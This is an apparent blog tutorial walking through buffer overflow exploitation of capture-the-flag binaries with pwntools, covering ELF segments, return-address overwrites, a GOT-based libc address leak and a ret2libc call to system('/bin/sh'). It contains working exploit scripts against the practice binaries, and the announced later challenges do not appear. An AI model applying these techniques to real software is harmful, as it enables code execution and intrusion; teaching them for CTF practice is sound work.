How2BufferFlow
July 16th 2021
How 2 buffer(over)flow
A detailed step for step guide on how to exploit simple buffer overflows and more.
Examples will include these binaries:
- ret2win (Easy; basic bufferoverflow)
- pwn_12c (Easy & Medium, 2 challs in one)
- ropncall (Medium; Ropping required)
- Librarian 3 (Hard; longer exploit)
And there's also some more information:
Structure of ELFs and some data gathering
This is a long explanation what a cool little tool does, to see what that does, just go to the next section.
So before we can actually exploit something we need to see what
we can use. For this the readelf
tool from binutils is a great
tool.
If we run readelf -l <binary>
on any of the binaries provided we
will get a short summary of all the segments which are important
when we start the program. There are different types, but for
now all we care about are the "LOAD" segments. We can
read the Offset in the file (in bytes), the Virtual address
the program should be loaded to, the size of the section
and which flags the segment will have once it's loaded.
The most important segments are the ones with an "E" in the flags, since those are the segements with the code. If there's a segement with "RWE", then you don't ensure that nobody can overwrite the code you're executing or that nobody executes data as code (Generally W^X is enabled though).
Another thing you might see when doing that is that the Virtual Address of a segment is zero and the next one is just the size if the first, the next is at address of the sum of the previous segments, etc. This indicates that the binary was compiled with the -fPIE (or equivalent) switch, which makes the binary loadable at any address, as long as all the things stay at the same offsets (Position Independent Code). This makes exploitation considerably harder, since we don't know at which address the binary was loaded (Address Space Layout Randomization will put it at a random address)
Intro to pwntools
Run pip install pwntools
to get the pwn tools you need to exploit
all the binaries (seriously pwntools is great). Make sure you install
it in such a way that the installed binaries are in your path
(Easiest to do if you install with root; if they're not in your path
pip will warn you about that after installing)
Now if you get a pwn challenge all you need to do is to run
pwn template --host remote --port port binary > exploit.py
and then you have a nice template to work with (You can leave
the --host and --port if you don't have a remote; check the help
page of pwn template
for more information).
In the template you will also have a comment indicating some things we manually deciphered from readelf before: namely the PIE status and if there's no PIE the base address. Then also if there's RELocation Read Only (RELRO), the NX bit (Not executable (data), which would be disabled if there's a RWX segment), and also if there's a stack canary. The stack canary is simply a random integer at the end of the stack but before the return address, such that a buffer overflow could be detected if the value set at the beginning of the function was modified during the function.
Now you can run that template with some flags: GDB
will start
a gdb attached to the program, LOCAL
will launch it locally
(Default is on the server if you have specified a host and a port),
DEBUG
will print all the bytes that are sent and received,
NOASLR
will (try to) disable ASLR and make the addresses predictable
and there are some more, but these are the most important ones.
Now let's look at what we need to do in the code to interact
with the binary. There should be a short example of what you can
do. All the interactions with the binary will be done with the
io
object. To log you can use info("x is: 0x%x", number)
or debug
with the same printf-like syntax (Or just use print,
I don't care)
The io
object is a "Tube" which just means that it's a wrapper
around the binary such that no matter how you execute it, the interaction
will be the same. There a few interaction methods implemented, those
are via sockets (remote), subprocesses (local) and some more obscure ones
like SSH and Serial. But in all cases after getting the io
object,
the functions will be the same.
Sending
To send you can simply do io.send(data)
or io.sendline(data)
if you want to have the newline appended automatically.
Receiving
To read you can do io.recv(num)
for a specific number of bytes
io.recvline()
to read a line, io.recvuntil("waiting_for")
which will wait until the binary prints "waiting_for". (In the latter
both bytes and strings are accepted).
Interacting
Once you got a shell or if you want to simply play with the binary,
you can call io.interactive()
which will hand over the io to
the stdin/stdout for you to interact with
Packing / Unpacking ints
To send 32 or 64 bit integers
as raw bytes you have the methods p32
and p64
, to convert
a set of 4, or 8, bytes into a 32, or 64, bit integer you have
u32
and u64
. Make sure the buffers are the correct lengths
when unpacking.
cyclic
There's a neat little function called cyclic
, it takes
an integer parameter and spits out that many bytes. If you
have four bytes of that pattern, you can identify at what
position those bytes were with the function cyclic_find("....")
,
which is especially useful for buffer overflows and detecting
how many bytes you have to overflow (I mean you can always just
calculate it from the stack pointer in the disassembly, up to you)
fit
fit
is another cool function which takes a dictionary and
makes the values fit at the position (key), so for the
dict {0: "123", 6: "456", 12: "1111111"}
, fit will produce
b'123aba456aaa1111111'
. The spaces where there's nothing
are filled with the same pattern as cyclic
produces,
inputs are either strings or byte objects but output is
always a byte object.
shellcraft & rop
Useful for shellcoding and ropping, but I'll be doing everything manually in this guide, since we're here to learn how2bufferflow, not how the use pwntools (But seriously, you should look into them too, makes ropping easier)
The exe object
The template automatically made an object exe
for you,
with this you can access symbols, the got and the plt
very easily. Even if the binary has no symbols, if it
is compiled dynamically, then the got and plt will contain
functions with names (Since they are often dynamically loaded).
To get the offset/address of a symbol you can do exe.sym["name"]
,
for example if you want the address to the main function you can do
exe.sym["main"]
. Alternatively you can do exe.sym.main
if you
like that syntax more.
The same can be done with the plt/got tables. Just do exe.got["puts"]
to get the address for puts in the got and exe.plt["puts"]
to get
the address/offset of puts in the plt
To get the address to the start of the bss you can do exe.bss()
Now that I told you how to get those values, what are they for? Well, the Procedure Linking Table contains functions to lazily load functions (meaning you only load the function when you execute it for the first time). If the function has already been loaded then the Global Offset Table holds the pointer to the function and the plt function just jumps to that pointer. The bss is just uninitialized data - so in a read/write segment - and in programming languages this contains globals / static variables which are accessible over the entire program but which are not malloced.
So if you want to call a function from a library, you do that over the plt, if you want the pointer of a library function you look in the got (Useful for leaking libc addresses :P)
The first bufferflow [ret2win]
First things first, open the file in any disassembler/decompiler (Doesn't really matter if you use ghidra, ida, binary ninja, cutter, ...) You just have to find the main() function (be aware, binary ninja optimizes stuff out here!) You should get something like this: (Ghidra output of main)
undefined8 main(void)
{
undefined local_24 [12];
undefined local_18 [12];
uint local_c;
setvbuf(stdout,(char *)0x0,2,0);
setvbuf(stdin,(char *)0x0,2,0);
local_c = 0xdeadbeef;
puts("Casual stroll wont do, step somewhere specific");
__isoc99_scanf("%20s",local_18);
if (local_c == 0x1337c0d3) {
puts("Check");
__isoc99_scanf("%44s",local_24);
}
return 0;
}
so we see that we first read 20 chars into local_18
and if
another variable (which is after local_18
) has a certain
value we do another read with more characters. If you just try
to input 20 characters into the binary you'll see that it just
exists, so first we need to make sure we get it to crash (by
overwriting the return address). To do so, we first
need to overflow the value in local_c
, so we do
io = start()
io.sendline(cyclic(12) + p32(0x1337c0d3))
io.interactive()
and voilĂ , we get into the if statement. Why we chose 12 should be clear
from the stack layout (The local_c
is directly after the local_18
,
the size of which being 12, so just overflow it).
Next we want to figure out if we crash, so we extend the exploit to this:
io = start()
io.sendline(cyclic(12) + p32(0x1337c0d3))
io.recvuntil("Check")
io.sendline(cyclic(44)) # we read 44 chars in the second scanf
io.interactive()
and for sure we get a SIGSEGV, so time to add GDB to the parameters and investigate. If you don't have any extensions to help you debugging installed in gdb, I can suggest gdb-peda, pwndbg or gef.
If you get an error that you need to set "terminal", then you need to
first start tmux (such that the script can multiplex the output and
gdb in the same terminal window). If you don't like the splitting
top and bottom, but would rather have left and right, then just add
context.terminal = ["tmux", "split", "-h"]
into your exploit script
(Before calling io=start()
)
Next, just enter a c
into gdb to continue execution and wait
for it to trigger the segfault. It should stop at a ret
instruction
and you should see the return address on the stack, which should be
"jaaakaaa" if you read it as a string.
Now we just have to find the offset we need to write the return address
we want. Oh lucky us that there is cyclic_find
, so open an interactive
python shell, from pwn import *
and do cyclic_find("jaaa")
to get
the offset of 36. The challenge name indicates that we should return
to the function called "win", so let's just do that. We know that there's
no PIE (thanks pwntools), so all addresses are fixed, so we just take
the address of the win function with the symbols of the file.
So we update our exploit like this:
io = start()
io.sendline(cyclic(12) + p32(0x1337c0d3))
io.recvuntil("Check")
io.sendline(fit({36: p64(exe.sym.win) }))
io.interactive()
the fit function will make our payload such that the 64-bit return address will be at offset 36. And we're done and get the flag :)
The second bufferflow [pwn_12c easy part]
Well, template and ghidra go brrrr. Again the goal is to call the win function, this time we have to pass some arguments too though. Luckily this time we have a gets, which means we're not limited by character counts.
So first we need to determine the length of stack variables
io = start()
io.sendline(cyclic(100)) # should well overflow anything
io.interactive()
again, start with GDB and continue until you get the segfault, look at the top of the stack (or the current EIP/RIP value if it tried to jump there) and search for the first four characters' offset in the cyclic pattern. In our case it jumped to the address, before realizing that there's nothing there. So in EIP we have 0x6161616e and peda kindly tells us that that is "naaa". Thus our offset is 52.
An alternative to this dynamic approach would be to compute
the offset based on the RBP/EBP inside the function,
so in this example, if we look at the disassembly we see that it does
08049273 8d 45 d0 LEA EAX=>local_34,[EBP + -0x30]
to load the address of the buffer for the gets call. So we could
just compute the return address to be at 0x34 == 52
(Since there's the old ebp before the return value, and the EBP points
to that old EBP value)
So now let's debug it with this exploit: (Launch with GDB and set
a breakpoint in win, by typing break win
before doing c
)
io = start()
payload = p32(exe.sym.win) + cyclic(20)
io.sendline(fit({52:payload})) # should well overflow anything
io.interactive()
Once there, single step (By doing ni
) to the first compare.
There we can inspect the value of the argument by doing
x/wx $ebp+8
, which should be 0xdeadbeef. We see that that
is 0x61616162. Interesting, let's continue with the second
parameter at $ebp+12
and we see that it's 0x61616163. So
we see that our arguments are just the part after the return
address and another four bytes on the stack (For 32 bit programs at least),
so let's just put that into our payload:
io = start()
payload = p32(exe.sym.win) + b"aaaa" + p32(0xdeadbeef) + p32(0xba5eba11) + p32(0x1337c0de)
io.sendline(fit({52:payload})) # should well overflow anything
io.interactive()
and we pass all the checks, hooray, 1/2 done with this challenge.
The shell exploit [pwn_12c medium part]
This time we need to exploit the same binary as before, but
we need to get a shell, so launch "/bin/sh" or a similar
program. We already know the correct offset, so we just need
to adjust our payload to do the correct thing. We can trivially
call system
by calling it in the .plt section. The hard part
is to get a string "/bin/sh" into the program and then a pointer
to that on the stack (Since we want to execute that). First I'll
show the intended version since that's harder than my solution,
so first we need to leak the libc because there are "/bin/sh"
strings in libc, but at different addresses for each version.
As I said to call a function we call it in the plt and to get
the address we look into the got, so to leak a address from libc
we can simply call the libc function puts
which the program
uses (Thus the resolved address is certainly in the got) and
then pass it a got address.
io = start()
payload = p32(exe.plt.puts) + b"aaaa" + p32(exe.got.puts)
io.sendline(fit({52:payload})) # should well overflow anything
io.recvuntil("flag!\n")
x = u32(io.recv(4))
info("Got puts address: %x", x)
io.interactive()
with this we can leak a single address, but to know which version of libc the remote has, we need more, luckily there's 4 bytes of return address left which is not an argument, so we interleave two calls to puts with different got entries.
io = start()
payload = p32(exe.plt.puts) + p32(exe.plt.puts) + p32(exe.got.puts) + p32(exe.got.gets)
io.sendline(fit({52:payload})) # should well overflow anything
io.recvuntil("flag!\n")
x = u32(io.recv(4))
info("Got puts address: %x", x)
io.recvline() # clear the line from the puts
x = u32(io.recv(4))
info("Got gets address: %x", x)
io.recvline()
io.interactive()
Make sure you use functions which are loaded into the got
(aka they were called at least once). When you get
two functions, you can use the libc db
to find out which version of libc the remote server is running.
on the website it even has useful exploitation information,
like str_bin_sh 0x195b84
, which means for us that
there's a "/bin/sh" at offset 0x195b84 in libc
Now our final exploit can finally begin to take form. First we need to leak a single address from libc but then we need to input something again to input the address to the /bin/sh string with correct libc base address. this is easily done by just calling the "run" function again and doing the exploit again, so first we leak the libc address like earlier, but call run() instead of segfaulting:
io = start()
payload = p32(exe.plt.puts) + p32(exe.sym.run) + p32(exe.got.puts)
io.sendline(fit({52:payload})) # should well overflow anything
io.recvuntil("flag!\n")
x = u32(io.recv(4))
info("Got puts address: %x", x)
io.interactive()
Now we have the base address, the offset to a /bin/sh string, so let's just combine it right away:
io = start()
payload = p32(exe.plt.puts) + p32(exe.sym.run) + p32(exe.got.puts)
io.sendline(fit({52:payload})) # should well overflow anything
io.recvuntil("flag!\n")
x = u32(io.recv(4))
info("Got puts address: %x", x)
payload = p32(exe.plt.system) + b"aaaa" + p32(x + 0x195b84 - 0x714c0) # /bin/sh string inside libc => param for system()
io.sendline(fit({52:payload})) # should well overflow anything
io.interactive()
the offsets 0x714c0 and 0x195b84 are both taken
straight from libc.rip, we need to subtract the puts address to
get the base address and then add the str_bin_sh
offset to
get the string address. And that's it, we got a shell
(At least I get one on my machine, since those offsets
are for my libc, they most likely will differ for your system!)
< DH MITM | ImaginaryCTF Round 11 Writeup >